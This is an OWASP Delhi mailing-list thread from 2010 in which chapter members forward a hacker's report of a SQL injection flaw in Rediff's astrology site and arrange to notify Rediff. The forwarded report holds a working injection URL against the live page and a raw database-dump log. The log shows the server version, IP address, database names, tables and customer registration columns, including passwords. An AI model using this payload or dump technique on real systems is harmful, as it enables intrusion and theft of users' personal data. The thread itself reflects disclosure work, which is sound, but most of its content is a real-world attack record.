[Owasp-delhi] Rediff Astrology

Lakshmanan, Sriram sriram_lakshmanan at uhc.com
Tue Jun 15 01:38:39 EDT 2010


I've notified a senior person in Rediff who in turn will engage with the
Tech team. If there is someone in Mumbai OWASP who can help explain and
talk to the team there, I can patch the person on. Thanks
 

warm regards,

Sriram

SEC_R_TY. U & I are in it together. Everyone's responsible - Everywhere

 

________________________________

From: owasp-delhi-bounces at lists.owasp.org
[mailto:owasp-delhi-bounces at lists.owasp.org] On Behalf Of Soi, Dhruv
Sent: Monday, June 14, 2010 11:17 PM
To: owasp-delhi at lists.owasp.org; owasp-bangalore at lists.owasp.org;
owasp-mumbai at lists.owasp.org
Subject: [Owasp-delhi] Rediff Astrology



Another one to notify Rediff that readers' daily fortune can be fixed by
someone... Seems Rediff needs a lot of OWASP, do inform them that it's
free!!

 

From: "Jack H4xor" 
Sent: 14 June 2010 12:07
To: dhruv.soi at owasp.org
Subject: Rediff Astrology

 

y0,


h0rr1bl3 th4n h0rr0r

Vulnerable Url : 

http://astrology.rediff.com/zodiaczone/astroparents-resultpg.asp?pzodiac
=Scorpiox%27%20OR%201=convert%28int,@@version%29--

 

********************************************************************
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+     -==  MSSQL Information Schema astrology.rediff.com  ==-     +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[ + ] URL : http://astrology.rediff.com/zodiaczone/astroparents-resultpg.asp?pzodiac=Scorpiox'
[ + ] Date: Tue May 18 20:58:26 2010
[ + ] Displaying information about MSSQL host !

[ + ] @@VERSION  :      Microsoft SQL Server  2000 - 8.00.194 (Intel X86)
                        Aug  6 2000 00:57:48
                        Copyright (c) 1988-2000 Microsoft Corporation
                        Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)

[ + ] USER ()          : dbo
[ + ] S_USER ()        : astrology
[ + ] DB_NAME ()       : astro
[ + ] HOST_NAME ()     : ASTROLOGY
[ + ] SERVER_NAME ()   : SEARCHDB
[ + ] SERVER_TYPE ()   : Microsoft-IIS/6.0
[ + ] X-POWERED-By ()  : ASP.NET
[ + ] IP_ADDRESS_INFO  : 202.54.124.173

[ - ] We Can't get number of Databases !

[ ! ] Start dumping database Names !
[ ? ] But first choice number of DB to dump :> 20

[ + ] Displaying list of 20 databases on this MSSQL host !

[ DATABASE: 0 ]        : astro
[ DATABASE: 1 ]        : master
[ DATABASE: 2 ]        : tempdb
[ DATABASE: 3 ]        : model
[ DATABASE: 4 ]        : msdb
[ DATABASE: 5 ]        : pubs
[ DATABASE: 6 ]        : Northwind
[ DATABASE: 7 ]        : travel
[ DATABASE: 8 ]        : travel_int
[ DATABASE: 9 ]        : astro
[ DATABASE: 10 ]        : Jobsearch
[ DATABASE: 11 ]        : astroyogiD
[ DATABASE: 12 ]        : matrimonial
[ DATABASE: 13 ]        : investornew
[ DATABASE: 14 ]        : test

[ ! ] Vulnerability Database is   :  astro

[ + ] Displaying Tables inside DB :> astro

[ ? ] Numbers of Tables To Dispaly ?
[ + ] Specify Numbers   :> 200

[ TABLES: 0 ]          : ALLIANCE_PARTNER_COMMISSION
[ TABLES: 1 ]          : ALLIANCE_PARTNER_MASTER
[ TABLES: 2 ]          : astrolove
[ TABLES: 3 ]          : astroparent
[ TABLES: 4 ]          : CITY
[ TABLES: 5 ]          : COMPLETE_ORDER_DETAIL
[ TABLES: 6 ]          : COMPLETE_SUBSCRIPTION_DETAIL
[ TABLES: 7 ]          : COUNTRY
[ TABLES: 8 ]          : CUSTOMER_CARE_DETAILS
[ TABLES: 9 ]          : CUSTOMER_CARE_MASTER
[ TABLES: 10 ]          : CUSTOMER_PERSON1
[ TABLES: 11 ]          : CUSTOMER_PERSON2
[ TABLES: 12 ]          : CUSTOMER_PERSON3
[ TABLES: 13 ]          : darshtest
[ TABLES: 14 ]          : dtproperties
[ TABLES: 15 ]          : FENGSHUI
[ TABLES: 16 ]          : FRANCHISEE_MASTER
[ TABLES: 17 ]          : idealmate
[ TABLES: 18 ]          : INTERNATIONAL_PARTNER_MASTER
[ TABLES: 19 ]          : NUMEROLOGY
[ TABLES: 20 ]          : ORDER_DETAILS
[ TABLES: 21 ]          : ORDER_MASTER
[ TABLES: 22 ]          : ORDER_REMARKS
[ TABLES: 23 ]          : ORDERS
[ TABLES: 24 ]          : p1
[ TABLES: 25 ]          : p3master
[ TABLES: 26 ]          : PALMISTRY
[ TABLES: 27 ]          : PAYMENT_METHOD_MASTER
[ TABLES: 28 ]          : PROBLEM_ANSWER
[ TABLES: 29 ]          : PROBLEM_CATEGORY
[ TABLES: 30 ]          : REGISTRATION
[ TABLES: 31 ]          : SHIPPING_DETAILS
[ TABLES: 32 ]          : SPCFIC_ANLYS
[ TABLES: 33 ]          : SUBSCRIBER_DETAILS
[ TABLES: 34 ]          : SUBSCRIBER_MASTER
[ TABLES: 35 ]          : SUBSCRIBER_REGISTRATION
[ TABLES: 36 ]          : SUBSCRIBER_TRANSACTION
[ TABLES: 37 ]          : SUBSCRIPTION_DETAILS
[ TABLES: 38 ]          : SUBSCRIPTION_MASTER
[ TABLES: 39 ]          : sysconstraints
[ TABLES: 40 ]          : syssegments
[ TABLES: 41 ]          : test
[ TABLES: 42 ]          : USER_ASTROLOGER_PRODUCT_TRANSACTION
[ TABLES: 43 ]          : zodiac

[ + ] Done !

[ + ] Start dumping all Columns from table :> REGISTRATION

[ ? ] Numbers of Columns To Display ?
[ + ] Specify Numbers    :> 50

[ + ] Displaying 50 Columns inside Table: REGISTRATION and Database: astro

[ COLUMNS : REGISTRATION ] 0 ]         : FRANCHISEE_ID
[ COLUMNS : REGISTRATION ] 1 ]         : PARTNER_ID
[ COLUMNS : REGISTRATION ] 2 ]         : REGISTRATION_ADDRESS
[ COLUMNS : REGISTRATION ] 3 ]         : REGISTRATION_BIRTH_COUNTRY
[ COLUMNS : REGISTRATION ] 4 ]         : REGISTRATION_BIRTH_DATE
[ COLUMNS : REGISTRATION ] 5 ]         : REGISTRATION_BIRTH_PLACE
[ COLUMNS : REGISTRATION ] 6 ]         : REGISTRATION_BIRTH_TIME_HOUR
[ COLUMNS : REGISTRATION ] 7 ]         : REGISTRATION_BIRTH_TIME_MINUTES
[ COLUMNS : REGISTRATION ] 8 ]         : REGISTRATION_CELL_NO
[ COLUMNS : REGISTRATION ] 9 ]         : REGISTRATION_COUNTRY
[ COLUMNS : REGISTRATION ] 10 ]         : REGISTRATION_DATE
[ COLUMNS : REGISTRATION ] 11 ]         : REGISTRATION_EMAIL_ID
[ COLUMNS : REGISTRATION ] 12 ]         : REGISTRATION_FIRSTNAME
[ COLUMNS : REGISTRATION ] 13 ]         : REGISTRATION_GENDER
[ COLUMNS : REGISTRATION ] 14 ]         : REGISTRATION_ID
[ COLUMNS : REGISTRATION ] 15 ]         : REGISTRATION_IP
[ COLUMNS : REGISTRATION ] 16 ]         : REGISTRATION_LASTNAME
[ COLUMNS : REGISTRATION ] 17 ]         : REGISTRATION_PASSWORD
[ COLUMNS : REGISTRATION ] 18 ]         : REGISTRATION_TELEPHONE_NO
[ COLUMNS : REGISTRATION ] 19 ]         : REGISTRATION_USERNAME

[ ! ] Done !

[ ! ] All information was recorded in astrology.rediff.com.txt file !

[ 1 ] : Return to Tables  !
[ 2 ] : Return to Columns !

[ ? ] : Oprion :>

Thanks & Regards

Jackh4xor

( h4cky0u )
